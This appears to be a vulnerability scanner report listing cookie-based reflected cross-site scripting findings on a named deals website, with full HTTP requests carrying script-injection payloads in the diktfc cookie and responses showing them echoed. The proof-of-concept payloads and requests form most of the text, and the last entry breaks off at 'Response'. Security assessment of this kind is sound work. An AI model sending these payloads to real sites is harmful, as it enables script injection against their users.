HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:00 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:00 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47416
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcb82"><script>alert(1)</script>9d654d77a5c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/computer-39 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abcb82"><script>alert(1)</script>9d654d77a5c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:58 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:58 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47444
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/computer-39&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abcb82"><script>alert(1)</script>9d654d77a5c&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4441"%3balert(1)//cc97a4d4e35 was submitted in the diktfc cookie. This input was echoed as b4441";alert(1)//cc97a4d4e35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/dating-services-445 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab4441"%3balert(1)//cc97a4d4e35; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:48 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:49 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17051
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c53d"><script>alert(1)</script>985194847a was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/dating-services-445 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c53d"><script>alert(1)</script>985194847a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:47 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:47 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17079
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/dating-services-445&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c53d"><script>alert(1)</script>985194847a&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 530f2"%3balert(1)//66373ee2c96 was submitted in the diktfc cookie. This input was echoed as 530f2";alert(1)//66373ee2c96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/digital-cameras-168 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A530f2"%3balert(1)//66373ee2c96; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:55 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47421
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ebbb"><script>alert(1)</script>5ed481c16d2 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/digital-cameras-168 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8ebbb"><script>alert(1)</script>5ed481c16d2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:52 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:53 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 48438
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/digital-cameras-168&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8ebbb"><script>alert(1)</script>5ed481c16d2&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8df10"><script>alert(1)</script>decb6417e3f was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/electronics-142 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8df10"><script>alert(1)</script>decb6417e3f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:05 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:06 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 48988
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/electronics-142&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8df10"><script>alert(1)</script>decb6417e3f&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba404"%3balert(1)//a1b2a499f40 was submitted in the diktfc cookie. This input was echoed as ba404";alert(1)//a1b2a499f40 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/electronics-142 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aba404"%3balert(1)//a1b2a499f40; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:07 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:08 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 48973
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d3fd"><script>alert(1)</script>7ca665b3883 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/financial-services-439 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6d3fd"><script>alert(1)</script>7ca665b3883; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:56 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:56 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17263
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/financial-services-439&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6d3fd"><script>alert(1)</script>7ca665b3883&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d716"%3balert(1)//059f898a8b was submitted in the diktfc cookie. This input was echoed as 9d716";alert(1)//059f898a8b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/financial-services-439 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9d716"%3balert(1)//059f898a8b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:57 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:57 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17219
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2eb80"%3balert(1)//5af42826628 was submitted in the diktfc cookie. This input was echoed as 2eb80";alert(1)//5af42826628 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/food-and-drink-213 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2eb80"%3balert(1)//5af42826628; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:15 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31364
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86fb9"><script>alert(1)</script>f0965134d1e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/food-and-drink-213 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A86fb9"><script>alert(1)</script>f0965134d1e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:13 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 32243
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/food-and-drink-213&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A86fb9"><script>alert(1)</script>f0965134d1e&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70f84"><script>alert(1)</script>4a6d4c1536e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/gaming-and-toys-186 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A70f84"><script>alert(1)</script>4a6d4c1536e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:26 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:26 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47419
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/gaming-and-toys-186&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A70f84"><script>alert(1)</script>4a6d4c1536e&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d8a5"%3balert(1)//fe2e4db2273 was submitted in the diktfc cookie. This input was echoed as 5d8a5";alert(1)//fe2e4db2273 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/gaming-and-toys-186 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5d8a5"%3balert(1)//fe2e4db2273; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:28 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:28 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47370
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0282"%3balert(1)//7489f873325 was submitted in the diktfc cookie. This input was echoed as e0282";alert(1)//7489f873325 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/gifts-flowers-and-cards-218 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae0282"%3balert(1)//7489f873325; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
